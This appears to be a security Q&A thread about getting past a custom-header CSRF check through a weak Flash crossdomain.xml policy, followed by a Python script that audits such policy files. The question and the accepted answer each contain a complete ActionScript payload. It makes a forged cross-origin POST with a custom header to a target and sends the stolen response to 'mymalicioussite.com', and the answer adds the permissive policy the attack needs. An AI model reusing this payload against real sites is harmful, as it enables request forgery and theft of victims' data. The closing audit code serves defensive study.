4

I have a target which has a weak CrossDomain.xml, but it prevents CSRF attacks by looking at one of the custom HTTP headers. I found the following ActionScript on a couple of websites, which works perfectly except that it doesn't set the header.

This ActionScript sends a POST request to 'Target.htm' and I need it to set any custom header, say Test-Header:

package {
    import flash.display.Sprite;
    import flash.events.*;
    import flash.net.URLRequestMethod;
    import flash.net.URLRequest;
    import flash.net.URLLoader;
    import flash.net.URLVariables;
    import flash.net.URLRequestHeader;

    public class FlashTest extends Sprite {

        public function FlashTest() {
            // write as3 code here..
            //Target URL           
            var header:URLRequestHeader = new URLRequestHeader("Test-Header", "Test123");
            var readFrom:String = "http://192.168.100.4/Target.htm";
            var readRequest:URLRequest = new URLRequest(readFrom);
            readRequest.data  = "ThisDoesNotMatter"
            readRequest.method = URLRequestMethod.POST
            readRequest.requestHeaders.push(header);
            var getLoader:URLLoader = new URLLoader();
            getLoader.addEventListener(Event.COMPLETE, eventHandler);
            try
            {
                getLoader.load(readRequest);
            }
            catch(error:Error)
            {

            }
        }

        private function eventHandler(event:Event):void
        {
            var sendTO:String = "http://mymalicioussite.com";
            var sendRequest:URLRequest = new URLRequest(sendTO);
            sendRequest.method = URLRequestMethod.POST;
            sendRequest.data = event.target.data;
            var sendLoader:URLLoader = new URLLoader();
            try
            {
                sendLoader.load(sendRequest);
            }
            catch(error:Error)
            {

            }
        }
    }
}

CrossDomain.XML on the target:

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" secure="true" />
</cross-domain-policy>

Any help would be appreciated. Working code with a GET request instead of POST would also work, as the target accepts both GET and POST requests. As far as I know, setting custom headers is allowed only with POST requests, but a GET request with any standard HTTP header would work for me, at least for now.

6
  • Does crossdomain.xml have allow-http-request-headers-from ? Commented Mar 26, 2017 at 11:40
  • @paj28: Yes, it allows requests from any domain. <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "adobe.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*" secure="true" /> </cross-domain-policy> Commented Mar 26, 2017 at 13:04
  • I don't see allow-http-request-headers-from in that snippet. Commented Mar 26, 2017 at 13:39
  • @paj28: Sorry about that, the crossdomain.xml on target does not have 'allow-http-request-headers-from'. However, if I add this header to the crossdomain.xml on requesting domain, would it work? Commented Mar 26, 2017 at 13:40
  • I think so. You'd need to try it to be sure Commented Mar 26, 2017 at 14:20

1 Answer

1

After performing a few tests, I was able to modify the script mentioned above to set any custom header (except for the Referer and User-Agent headers, which browsers do not allow):

Also, this works only if the target and attacking machine have the following crossdomain.xml:

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
 <allow-access-from domain="*" secure="false" />
 <allow-http-request-headers-from domain="*" headers="*" secure="false"/>
</cross-domain-policy>

And here is the AS3 script that worked for me:

package {
import flash.display.Sprite;
import flash.events.*;
import flash.net.URLRequestMethod;
import flash.net.URLRequest;
import flash.net.URLLoader;
import flash.net.URLVariables;
import flash.net.URLRequestHeader;

public class FlashTest extends Sprite {

    public function FlashTest() {
        // write as3 code here..

        //Set Header
        var headers:Array = [new URLRequestHeader("TestHeader", "Test123")];

        //Target URL           
        var readFrom:String = "http://192.168.253.133/Target.htm";
        var readRequest:URLRequest = new URLRequest(readFrom);
        readRequest.requestHeaders = headers;
        readRequest.data  = "ThisDoesNotMatter" //POST data
        readRequest.method = URLRequestMethod.POST
        //readRequest.requestHeaders.push();
        var getLoader:URLLoader = new URLLoader();
        getLoader.addEventListener(Event.COMPLETE, eventHandler);
        try
        {
            getLoader.load(readRequest);
        }
        catch(error:Error)
        {

        }
    }

    private function eventHandler(event:Event):void
    {
        var sendTO:String = "http://mymalicioussite.com";
        var sendRequest:URLRequest = new URLRequest(sendTO);
        sendRequest.method = URLRequestMethod.POST;
        sendRequest.data = event.target.data;
        var sendLoader:URLLoader = new URLLoader();
        try
        {
            sendLoader.load(sendRequest);
        }
        catch(error:Error)
        {

        }
    }
}
}//package 
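From the defender's side, the difference between the two policies in this thread can be checked mechanically. The following is an added example, not part of the original question or answer: a small audit that flags a crossdomain.xml whose `allow-http-request-headers-from` rule lets any origin set the header a custom-header CSRF check relies on. The function names, finding codes and the two embedded policies (constructed from the shapes shown above) are assumptions made for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed sample: the policy shape the answer says is needed for the header to be set.
PERMISSIVE = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
 <allow-access-from domain="*" secure="false" />
 <allow-http-request-headers-from domain="*" headers="*" secure="false"/>
</cross-domain-policy>"""

# Constructed sample: the policy from the question (no header rule at all).
READ_ONLY = """<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" secure="true" />
</cross-domain-policy>"""

def header_allowed(pattern_list, header):
    """True if a comma-separated headers attribute covers `header`.
    A bare '*' matches everything; a trailing '*' matches a name prefix."""
    name = header.lower()
    for pat in (p.strip().lower() for p in pattern_list.split(",")):
        if pat == name or (pat.endswith("*") and name.startswith(pat[:-1])):
            return True
    return False

def audit_policy(xml_text, csrf_header):
    """Return sorted finding codes (hypothetical names) for a crossdomain.xml body."""
    root = ET.fromstring(xml_text.strip())
    findings = set()
    for rule in root.iter("allow-access-from"):
        if rule.get("domain", "").strip() == "*":
            findings.add("READ_ANY_ORIGIN")          # any SWF may read responses
        if rule.get("secure", "true").lower() == "false":
            findings.add("INSECURE_TRANSPORT")       # HTTP-served SWFs accepted
    for rule in root.iter("allow-http-request-headers-from"):
        if rule.get("secure", "true").lower() == "false":
            findings.add("INSECURE_TRANSPORT")
        if (rule.get("domain", "").strip() == "*"
                and header_allowed(rule.get("headers", ""), csrf_header)):
            # The custom-header CSRF check no longer distinguishes origins.
            findings.add("CSRF_HEADER_SETTABLE_BY_ANY_ORIGIN")
    return sorted(findings)

if __name__ == "__main__":
    for label, policy in (("permissive", PERMISSIVE), ("read-only", READ_ONLY)):
        print(label, audit_policy(policy, "Test-Header"))
```

A policy that must stay in place should name specific domains in both rules and list only the headers those domains need, so the CSRF header is never covered by a wildcard.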
